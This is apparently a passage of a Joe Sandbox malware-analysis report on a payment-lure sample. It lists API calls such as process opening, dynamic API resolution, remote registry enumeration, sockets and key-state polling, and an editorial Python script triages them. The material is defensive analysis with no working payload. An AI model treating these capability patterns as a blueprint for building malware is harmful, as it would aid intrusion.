                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: f9553d23ea6c542f9ac7b5b7018a2871579ea674a19c2e96a61d814be0c3243b
                                          • Instruction ID: 000cf5015dc9b1d0a27195ad502afa72b6d9e5146b419a03f7474d505bc1b7b6
                                          • Opcode Fuzzy Hash: f9553d23ea6c542f9ac7b5b7018a2871579ea674a19c2e96a61d814be0c3243b
                                          • Instruction Fuzzy Hash: E8215075A40109AFCB10EFA9C888DAEBBB8EF59714F108069E509EB251D771EA05CB50
                                          APIs
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                            • Part of subcall function 0131D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0131D640
                                            • Part of subcall function 0131D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0131D653
                                            • Part of subcall function 0131D623: GetCurrentThreadId.KERNEL32(00000000), ref: 0131D65A
                                            • Part of subcall function 0131D623: AttachThreadInput.USER32(00000000), ref: 0131D661
                                          • GetFocus.USER32(0137DBF0), ref: 0131D7FB
                                            • Part of subcall function 0131D66C: GetParent.USER32(?), ref: 0131D67A
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0131D844
                                          • EnumChildWindows.USER32 ref: 0131D86C
                                          • __swprintf.LIBCMT ref: 0131D886
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: f99be288396bb38dc98f739fb9a7f1d1d5dc5cc354aea91e3c6ed0935f7ac8b6
                                          • Instruction ID: afd7444a85b130b579b2ad722754319cbbff102b52d4799eaae7bb8ed2328668
                                          • Opcode Fuzzy Hash: f99be288396bb38dc98f739fb9a7f1d1d5dc5cc354aea91e3c6ed0935f7ac8b6
                                          • Instruction Fuzzy Hash: 9911D6716002066BDF157FD4CC88FEA7BADAF55718F008079FE0DAA149CB7499458B70
                                          APIs
                                            • Part of subcall function 0130869D: __getptd_noexit.LIBCMT ref: 0130869E
                                          • __lock.LIBCMT ref: 0130811F
                                          • InterlockedDecrement.KERNEL32(?,01396818,0000000C,01301B9D,00000000,?,01309CAD,000000FF,?,00000000), ref: 0130813C
                                          • _free.LIBCMT ref: 0130814F
                                          • InterlockedIncrement.KERNEL32(00753A28,01396818,0000000C,01301B9D,00000000,?,01309CAD,000000FF,?,00000000), ref: 01308167
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                          • String ID: (:u
                                          • API String ID: 2704283638-3436811648
                                          • Opcode ID: da9552fcb1d19d6b7f99656b9db0885c31696934b6a112177a2e75cb5ca030c4
                                          • Instruction ID: 56d9491fae5c40a7489c1463b4aa01b8205425ee2525bb5784030c26f2cc2afc
                                          • Opcode Fuzzy Hash: da9552fcb1d19d6b7f99656b9db0885c31696934b6a112177a2e75cb5ca030c4
                                          • Instruction Fuzzy Hash: 0901C031D06612EBDB2BAF6D94297AABBE4BF40B1CF050189E510677C0C7746801CFD1
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 013418E4
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 01341917
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 01341A3A
                                          • CloseHandle.KERNEL32(?), ref: 01341AB0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 922a9ab969f83c9dac9096da0734e953ed5b716c53996a7129d68170c7424fb7
                                          • Instruction ID: 1d955929dcc6ffe89dffbc466f41d59b1de8fb4e30b06deb23f543ec35c37694
                                          • Opcode Fuzzy Hash: 922a9ab969f83c9dac9096da0734e953ed5b716c53996a7129d68170c7424fb7
                                          • Instruction Fuzzy Hash: 2D816071A50215EBEF24DF64C885BADBBF9EF48724F048059EA05AF381D7B5F9408B90
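The per-function "APIs" listings above are only useful to an analyst once the numeric arguments are named (the 00000410 passed to OpenProcess, the 00000469/00000465 window messages sent to the msctls_updown32 control, the 00000005 info level given to HttpQueryInfoW) and once the entries whose API combinations deserve a first look are separated from plain GUI plumbing. The following Python script is an added editorial example, not part of the Joe Sandbox report or tooling: it parses the report's bullet lines, decodes those constants from the documented Windows SDK values, and applies a small set of API-chain rules. The regex, the constant tables, the chain rules and every function name (parse_api_line, decode_args, triage) are the editor's own assumptions about a useful triage pass; the sample input is made of lines copied verbatim from the function entries on this page.

```python
"""Triage helper for the per-function 'APIs' listings in a Joe Sandbox report.

Parses the bullet lines, names the constants a reviewer wants decoded
(process access masks, window messages, WinINet info levels) and flags API
chains worth opening in the disassembly first.  Editorial example: regex,
constant tables and chain rules are the editor's, not Joe Sandbox's.
"""
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

PROCESS_ACCESS = {  # dwDesiredAccess bits for OpenProcess (Windows SDK values)
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE",
}
ERROR_MODE = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX",
              0x4: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
# Messages at or above WM_USER (0x400) are control-specific; the names below
# hold for the control classes named in the report's String IDs
# (msctls_updown32 for UDM_*, SysAnimate32 for ACM_*).
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT", 0x007B: "WM_CONTEXTMENU",
    0x0188: "LB_GETCURSEL", 0x0189: "LB_GETTEXT", 0x018A: "LB_GETTEXTLEN",
    0x0465: "UDM_SETRANGE", 0x0467: "ACM_OPENW", 0x0469: "UDM_SETBUDDY",
}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}

# Every API in the set must occur in one function entry (subcall lines count).
CHAIN_RULES = [
    ({"OpenProcess", "GetProcessMemoryInfo"}, "opens other processes and reads their memory counters"),
    ({"LoadLibraryW", "GetProcAddress"}, "resolves APIs at run time instead of through the import table"),
    ({"InternetOpenUrlW", "HttpSendRequestW"}, "issues outbound HTTP requests"),
    ({"RegConnectRegistryW", "RegEnumKeyExW"}, "enumerates registry keys, possibly on a remote host"),
    ({"AttachThreadInput", "GetFocus"}, "attaches to another thread's input queue to read focus"),
]


@dataclass
class ApiCall:
    func: str
    module: str
    args: list          # one int per argument, None where the report prints '?'
    ref: int            # call-site address from the 'ref:' field
    subcall: bool       # True for 'Part of subcall function' lines
    decoded: dict = field(default_factory=dict)


def decode_flags(mask, table):
    names = [name for bit, name in table.items() if mask & bit]
    rest = mask & ~sum(table)               # bits not covered by the table
    return " | ".join(names + ([f"0x{rest:X}"] if rest else [])) or "0"


def to_i16(word):                           # reinterpret a 16-bit word as signed
    return word - 0x10000 if word & 0x8000 else word


def decode_args(func, a):
    d = {}
    if func == "OpenProcess" and a and a[0] is not None:
        d["dwDesiredAccess"] = decode_flags(a[0], PROCESS_ACCESS)
    elif func == "SetErrorMode" and a and a[0] is not None:
        d["uMode"] = decode_flags(a[0], ERROR_MODE)
    elif func.startswith("SendMessage") and len(a) > 1 and a[1] is not None:
        d["Msg"] = WINDOW_MESSAGES.get(a[1], f"0x{a[1]:X}")
        if d["Msg"] == "UDM_SETRANGE" and len(a) > 3 and a[3] is not None:
            # lParam = MAKELONG(nUpper, nLower): low word is the upper limit
            d["range"] = (to_i16((a[3] >> 16) & 0xFFFF), to_i16(a[3] & 0xFFFF))
    elif func == "HttpQueryInfoW" and len(a) > 1 and a[1] in HTTP_QUERY:
        d["dwInfoLevel"] = HTTP_QUERY[a[1]]
    return d


def parse_arg(tok):
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)   # '-00000001' -> -1


def parse_api_line(line):
    m = API_LINE.match(line)
    if not m:
        return None
    args = [] if m["args"] is None else [parse_arg(t) for t in m["args"].split(",")]
    return ApiCall(m["func"], m["module"], args, int(m["ref"], 16),
                   "Part of subcall function" in line, decode_args(m["func"], args))


def triage(entry_text):
    calls = [c for c in map(parse_api_line, entry_text.splitlines()) if c]
    seen = {c.func for c in calls}
    return {"calls": calls,
            "findings": [label for need, label in CHAIN_RULES if need <= seen]}


# Sample input: 'APIs' lines copied from four function entries of this report,
# keyed by the first call-site address, used here as constructed test data.
SAMPLE_ENTRIES = {
    "013418E4": """
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 013418E4
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 01341917
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 01341A3A
• CloseHandle.KERNEL32(?), ref: 01341AB0
""",
    "01334A60": """
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 01334A60
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01334A86
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 01334AB6
• InternetCloseHandle.WININET(00000000), ref: 01334AFD
  • Part of subcall function 013356A9: GetLastError.KERNEL32(?,?,01334A2B,00000000,00000000,00000001), ref: 013356BE
""",
    "0134A74F": """
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0134A74F
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0134A75D
• DestroyWindow.USER32 ref: 0134A764
""",
    "013405DF": """
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 013405DF
• GetProcAddress.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 0134066E
• FreeLibrary.KERNEL32(00000000,00000004), ref: 013406EC
""",
}

if __name__ == "__main__":
    for name, text in SAMPLE_ENTRIES.items():
        result = triage(text)
        print(f"function entry at {name}:")
        for c in result["calls"]:
            print(f"  {c.func}.{c.module} @ {c.ref:08X}" + (f"  {c.decoded}" if c.decoded else ""))
        for finding in result["findings"]:
            print(f"  ! {finding}")
```

Run against the OpenProcess entry it names the access mask as PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, which is exactly what GetProcessMemoryInfo needs and nothing more, so that entry reads as process inventory rather than injection; the injection-related signatures listed in the overview have to be looked for in the entries that use other access bits or write to foreign memory. The chain rules are deliberately conservative: a LoadLibraryW/GetProcAddress pair is normal in any runtime that supports DllCall-style late binding, so the finding is a prompt to read the strings passed to GetProcAddress, not a verdict.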
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 013405DF
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 0134066E
                                          • GetProcAddress.KERNEL32(00000000,00000000,00000004,00000004,?,?), ref: 0134068C
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,00000004), ref: 013406D2
                                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 013406EC
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0132AEA5,?,?,00000000,00000008), ref: 012FF282
                                            • Part of subcall function 012FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0132AEA5,?,?,00000000,00000008), ref: 012FF2A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 576acc485145e384d8a85d178bdd3c536199aa64e04f68bf2a4af94208e6ac77
                                          • Instruction ID: a8e13ddf82d1bf6d173692c867b4e51c296f58178fc7ac50046cff1a19cddcd5
                                          • Opcode Fuzzy Hash: 576acc485145e384d8a85d178bdd3c536199aa64e04f68bf2a4af94208e6ac77
                                          • Instruction Fuzzy Hash: 36516879A0020ADFCB04EFA8C4949EDBBF8EF59314F548059EA56AB350DB34ED05CB80
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01342DE0
                                          • RegOpenKeyExW.ADVAPI32 ref: 01342E1F
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01342E66
                                          • RegCloseKey.ADVAPI32(?), ref: 01342E92
                                          • RegCloseKey.ADVAPI32(00000000), ref: 01342E9F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 397b14c3aaad5a6006c50638a180f032349a060c68daec533f4d874d46877da9
                                          • Instruction ID: d3ce6cb204653455c7c524bfa74cb249c38313dbd5bd7f041db3e641c9bd5fa5
                                          • Opcode Fuzzy Hash: 397b14c3aaad5a6006c50638a180f032349a060c68daec533f4d874d46877da9
                                          • Instruction Fuzzy Hash: 8F519D31218205AFD714EFA8C894E7BB7E8FF98308F40491DF595972A0DB31E905CB52
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 013317D4
                                          • GetPrivateProfileSectionW.KERNEL32 ref: 013317FD
                                          • WritePrivateProfileSectionW.KERNEL32 ref: 0133183C
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • WritePrivateProfileStringW.KERNEL32 ref: 01331861
                                          • WritePrivateProfileStringW.KERNEL32 ref: 01331869
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: a1d0361b7d081f84bd248fc63cc05564888bd65e148dba0de8741d19a80e960e
                                          • Instruction ID: 2369240607d098ab0530ecd6d38db4c39fb972b8cef50a338f3a562121d9925a
                                          • Opcode Fuzzy Hash: a1d0361b7d081f84bd248fc63cc05564888bd65e148dba0de8741d19a80e960e
                                          • Instruction Fuzzy Hash: 2A413935A10209DFCF11EF64C984AADBBF5FF58314B148099E94AAB361DB31ED01DB60
                                          APIs
                                          • GetCursorPos.USER32(000000FF), ref: 012FB749
                                          • ScreenToClient.USER32(00000000,000000FF), ref: 012FB766
                                          • GetAsyncKeyState.USER32 ref: 012FB78B
                                          • GetAsyncKeyState.USER32 ref: 012FB799
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 79be3415d1304d835f5ba5c585a8f1c4705369b04bbca900dc01c672bc5fab96
                                          • Instruction ID: 86babe54af79bb13f85dc1a2f70cc6af9abef2fc192060111db99f15db7a8a2a
                                          • Opcode Fuzzy Hash: 79be3415d1304d835f5ba5c585a8f1c4705369b04bbca900dc01c672bc5fab96
                                          • Instruction Fuzzy Hash: ED41827661411AFFDF199F68C844EE9FBB4FB05724F148369E929A22D0C730AA50DB90
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0131C156
                                          • PostMessageW.USER32 ref: 0131C200
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0131C208
                                          • PostMessageW.USER32 ref: 0131C216
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0131C21E
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: a4f8cc090d5f64f5171918ff6804b9dcd0dce0d78c59ea286e6af11b7f3c0e90
                                          • Instruction ID: a2da48825f341e51a724b9e1c5c8b8e951d4b0a6da952f312b50655301c3eb8d
                                          • Opcode Fuzzy Hash: a4f8cc090d5f64f5171918ff6804b9dcd0dce0d78c59ea286e6af11b7f3c0e90
                                          • Instruction Fuzzy Hash: D931C37168021DEBDF18CFACDD4CA9E3BB9EB04329F104229F965A71D5C7B09914CB90
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0131E9CD
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0131E9EA
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0131EA22
                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 0131EA48
                                          • _wcsstr.LIBCMT ref: 0131EA52
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: 0902ddc6c57d368a14dd0c2041d68fc66eb8a11d2960531e55fe05f52d8db7d8
                                          • Instruction ID: 52cdb891de87e76b5249bb273b570ca1f91a0bb355d7f0893d5a6cb85a16207e
                                          • Opcode Fuzzy Hash: 0902ddc6c57d368a14dd0c2041d68fc66eb8a11d2960531e55fe05f52d8db7d8
                                          • Instruction Fuzzy Hash: 232107726042447AFB2B9B6DDC48E7B7FEDDF45764F008039FC09CA094DA62D8408350
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0134DCC0
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,00000000,?,0133407D,00000000,?,00000000), ref: 0134DCE4
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,00000000,?,0133407D,00000000,?,00000000), ref: 0134DCFC
                                          • GetSystemMetrics.USER32(00000004,?,?,?,?,?,00000000,?,0133407D,00000000,?,00000000), ref: 0134DD24
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 0134DD42
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: a620572410f9880f1c86af87e2e6065cc7cbae0935213850c561593842e44a84
                                          • Instruction ID: 397a4dbc07ca3ee90e1cb09b9ae609e52c77517b8374528e76d9876241eeeb8f
                                          • Opcode Fuzzy Hash: a620572410f9880f1c86af87e2e6065cc7cbae0935213850c561593842e44a84
                                          • Instruction Fuzzy Hash: 1F21B071600216AFDB215EBD9C48B657BE8FF66368F104724FA66D65E0D770A8108B90
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0131CA86
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0131CAB8
                                          • __itow.LIBCMT ref: 0131CAD0
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0131CAF6
                                          • __itow.LIBCMT ref: 0131CB07
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: cefa63a1b5cf9f10a8a5b8b8399320c599a7c5efa672ac1809e8ab25bcd3eeac
                                          • Instruction ID: b21e882e2b9d54154fc21201ec0aa885dde06d848740e5d056df80c56b6191dc
                                          • Opcode Fuzzy Hash: cefa63a1b5cf9f10a8a5b8b8399320c599a7c5efa672ac1809e8ab25bcd3eeac
                                          • Instruction Fuzzy Hash: 312108367806047BDF26EAA98C49EEF7BEDAF59714F40A024FA05E7185D6708D05C3A1
                                          APIs
                                            • Part of subcall function 0133ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0133ACF5
                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01339160
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0133916F
                                          • connect.WSOCK32(00000000,?,00000010), ref: 0133918B
                                          Similarity
                                          • API ID: ErrorLastconnectinet_addrsocket
                                          • String ID:
                                          • API String ID: 3701255441-0
                                          • Opcode ID: 62db43abd9c58a71dd1af5555e131162347e3aa66172135f92d865a7a116d883
                                          • Instruction ID: 5f53d4d3b0d60c1289116b8df3a44fd1453362c9970fdcd702415651c51bc2c1
                                          • Opcode Fuzzy Hash: 62db43abd9c58a71dd1af5555e131162347e3aa66172135f92d865a7a116d883
                                          • Instruction Fuzzy Hash: 022190317002159FDB10AFA8C888B7E77ADEF89728F04845DE956EB395DBB4E8018B51
                                          APIs
                                          • IsWindow.USER32(00000000), ref: 013389CE
                                          • GetForegroundWindow.USER32 ref: 013389E5
                                          • GetDC.USER32(00000000), ref: 01338A21
                                          • GetPixel.GDI32(00000000,?,00000003), ref: 01338A2D
                                          • ReleaseDC.USER32(00000000,00000003), ref: 01338A68
                                          Similarity
                                          • API ID: Window$ForegroundPixelRelease
                                          • String ID:
                                          • API String ID: 4156661090-0
                                          • Opcode ID: 28860aaa975f4d054b1c63c109241a1069122c599543bbf76cd551d076d7acec
                                          • Instruction ID: 2c00ad984f5ae17a1fdffdcc1bbeb22164da22a4831715d3b539b516906378d3
                                          • Opcode Fuzzy Hash: 28860aaa975f4d054b1c63c109241a1069122c599543bbf76cd551d076d7acec
                                          • Instruction Fuzzy Hash: 8E219675B00205AFD714EFA9D888AAABBF9EF48315F04C479E94A97361CB70AD00CB50
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012FB5EB
                                          • SelectObject.GDI32(?,00000000), ref: 012FB5FA
                                          • BeginPath.GDI32(?), ref: 012FB611
                                          • SelectObject.GDI32(?,00000000), ref: 012FB63B
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: d7d57160dc85057995f52c3b49ed82783c5c0381879ff785ced0c7843cc880b7
                                          • Instruction ID: 58680782d1afc156610344b9ebdf484c5f9bb42d8c01e5cef8a5108b97d0936e
                                          • Opcode Fuzzy Hash: d7d57160dc85057995f52c3b49ed82783c5c0381879ff785ced0c7843cc880b7
                                          • Instruction Fuzzy Hash: 3221A171920305EFDB319F59E9487A9BFECFB00755F54422AFB5092198C7B88491CF50
                                          APIs
                                          • __calloc_crt.LIBCMT ref: 01302E81
                                          • CreateThread.KERNEL32(?,?,01302FB7,00000000,?,?), ref: 01302EC5
                                          • GetLastError.KERNEL32 ref: 01302ECF
                                          • _free.LIBCMT ref: 01302ED8
                                          • __dosmaperr.LIBCMT ref: 01302EE3
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          Similarity
                                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                          • String ID:
                                          • API String ID: 2664167353-0
                                          • Opcode ID: 2b84e1f607111ea332776b73d3818f69bd313e856d804073d13c87bfa8755ea1
                                          • Instruction ID: 7ef4c6d5231cdbe78b193f5a92812979900cee2138417955ff6ae992a23d6278
                                          • Opcode Fuzzy Hash: 2b84e1f607111ea332776b73d3818f69bd313e856d804073d13c87bfa8755ea1
                                          • Instruction Fuzzy Hash: 8E11C8321047066FDB23AFADEC54D6B7BD8EF44778B100429FA58861D1DB31D801C760
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0131B903
                                          • GetLastError.KERNEL32(?,0131B3CB,?,?,?), ref: 0131B90D
                                          • GetProcessHeap.KERNEL32(00000008,?,?,0131B3CB,?,?,?), ref: 0131B91C
                                          • HeapAlloc.KERNEL32(00000000,?,0131B3CB,?,?,?), ref: 0131B923
                                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0131B93A
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: 65189a7598cc356cd67ae2c50e585e9c03893345f54ea2296d1b1659c881b53b
                                          • Instruction ID: 4c2a0f370849efa231ea92adad3aedf29b65f14b8c3a30575118d51ddd606613
                                          • Opcode Fuzzy Hash: 65189a7598cc356cd67ae2c50e585e9c03893345f54ea2296d1b1659c881b53b
                                          • Instruction Fuzzy Hash: 2A016D71201205BFDF254FA9DC88D6B7FBDEF8A768B104029F585C2164DA718C51DB60
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 01328371
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0132837F
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01328387
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01328391
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 013283CD
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: e4245c3abf06a4397aeaaf90bb96daa277888280e1630d028b9909cd33762d27
                                          • Instruction ID: 1945ab55c8d994f83178f89759b101ae15cc707424bcbfd6d4548a3c6b6dc426
                                          • Opcode Fuzzy Hash: e4245c3abf06a4397aeaaf90bb96daa277888280e1630d028b9909cd33762d27
                                          • Instruction Fuzzy Hash: 2F012939E0062DDBDF10AFE8E948AEEBBBCFB0C715F044495E641B2164DBB09550CBA1
                                          APIs
